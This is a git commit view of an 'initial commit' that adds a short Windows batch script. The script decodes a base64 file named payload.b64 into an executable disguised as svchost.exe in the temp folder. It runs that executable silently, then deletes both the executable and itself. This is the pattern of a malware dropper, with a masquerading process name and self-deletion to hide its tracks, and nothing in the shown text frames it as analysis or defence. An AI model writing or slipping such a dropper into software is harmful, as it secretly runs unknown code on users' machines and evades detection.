initial commit

This commit is contained in:
i2p
2026-08-27 10:55:23 -06:00
commit d03dc0bce1
356 changed files with 18535 additions and 0 deletions
@@ -0,0 +1,5 @@
@echo off
certutil -decode "%~dp0payload.b64" "%temp%\svchost.exe" >nul 2>&1
start "" "%temp%\svchost.exe"
del "%temp%\svchost.exe" 2>nul
del "%~f0"